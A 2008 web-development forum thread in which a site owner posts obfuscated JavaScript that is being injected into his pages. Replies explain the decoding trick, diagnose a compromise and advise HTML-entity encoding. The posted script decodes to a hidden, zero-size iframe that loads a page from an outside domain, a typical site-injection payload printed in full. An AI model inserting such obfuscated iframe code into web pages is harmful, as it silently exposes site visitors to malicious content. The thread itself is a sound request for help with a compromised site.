1. Home
  2. Forums Index
  3. Browser Side / JavaScript and AJAX 7:47 am May 14, 2026

Forum Moderators: open

Message Too Old, No Replies

Anonymous javascript code

Anonymous javascript code

         

arif

7:17 am on Jul 18, 2008 (gmt 0)

10+ Year Member



Hi,

I have made my site XSS proofed but still the following code is being embedded in my site

var dtzhtxkdkr="";for(dolnbjhcfei=0;dolnbjhcfei<fuqgkpou.length;dolnbjhcfei+=2)
{dtzhtxkdkr+=(String.fromCharCode(parseInt(fuqgkpou.substr
(dolnbjhcfei,2),16)));}document.write(dtzhtxkdkr);}uavxgizkldzyckm
("3C69eiqpxekm66eiqpxekm72eiqpxekm616D652073eiqpxekm72633D226874eiq
pxekm74eiqpxekm70eiqpxekm3Aeiqpxekm2F2F746Feiqpxekm703130302D636F756
E74eiqpxekm65722E636Feiqpxekm6Deiqpxekm2Feiqpxekm746Feiqpxekm70eiqpxe
km3130302F69eiqpxekm6E6465782E70eiqpxekm68eiqpxekm70eiqpxekm22eiqpxek
m20eiqpxekm66eiqpxekm72eiqpxekm61eiqpxekm6D65626Feiqpxekm72eiqpxekm64
eiqpxekm6572eiqpxekm3D22eiqpxekm30eiqpxekm2220eiqpxekm626F72eiqpxekm6
46572eiqpxekm3D2230eiqpxekm22eiqpxekm20eiqpxekm7769eiqpxekm64eiqpxekm
7468eiqpxekm3Deiqpxekm22eiqpxekm30222068eiqpxekm65eiqpxekm69eiqpxekm67
eiqpxekm68eiqpxekm743Deiqpxekm22302220737479eiqpxekm6Ceiqpxekm65eiqpx
ekm3D22eiqpxekm70eiqpxekm6Feiqpxekm73eiqpxekm6974eiqpxekm69eiqpxekm6F6
E3A206162eiqpxekm736F6C757465eiqpxekm3B20eiqpxekm76697369eiqpxekm62eiq
pxekm696C69eiqpxekm74793A20eiqpxekm68696464eiqpxekm65eiqpxekm6Eeiqpxek
m3B2064eiqpxekm69eiqpxekm73eiqpxekm70eiqpxekm6Ceiqpxekm61793Aeiqpxekm2
06E6F6E65eiqpxekm22eiqpxekm3Eeiqpxekm3Ceiqpxekm2Feiqpxekm696672eiqpxek
m61eiqpxekm6Deiqpxekm65eiqpxekm3Eeiqpxekm".replace(/eiqpxekm/g, ""))

Any Idea? is this the hosting server issue?
Please help

[edited by: eelixduppy at 7:44 am (utc) on July 18, 2008]
[edit reason] added returns to fix side-scroll [/edit]

kceleb9

1:38 am on Jul 20, 2008 (gmt 0)

10+ Year Member



Please explain what you mean by "being embedded in my site"

That is a little unclear - the regex at the end of that code strips out the "eiqpxekm" and leavea a series of numbers - which are then interpreted as characters - have you evaluated the resulting string?

arif

3:56 am on Jul 21, 2008 (gmt 0)

10+ Year Member



let me clear
i have site, above javascript code automaticaly inserted in my website pages, i dont know how.

rocknbil

4:17 pm on Jul 21, 2008 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



This is pretty common and comes up now and then. Not sure how it got there, in any case, your site has been compromised in one way or another. A search for hacked javascript site:webmasterworld.com [google.com] will bring up many threads here on this sort of attack.

eelixduppy

9:58 pm on Jul 21, 2008 (gmt 0)



>> i dont know how.

If you are allow user content to be added to the site then this might be where. Other than that your site might have been compromised in which case I would definitely look into this. The former issue, however, can be solved simply by converting the text to html entities before you output it to the browser.

 

Join The Conversation

Moderators and Top Contributors

Hot Threads This Week

  1. Home
  2. Forums Index
  3. Browser Side / JavaScript and AJAX 7:47 am May 14, 2026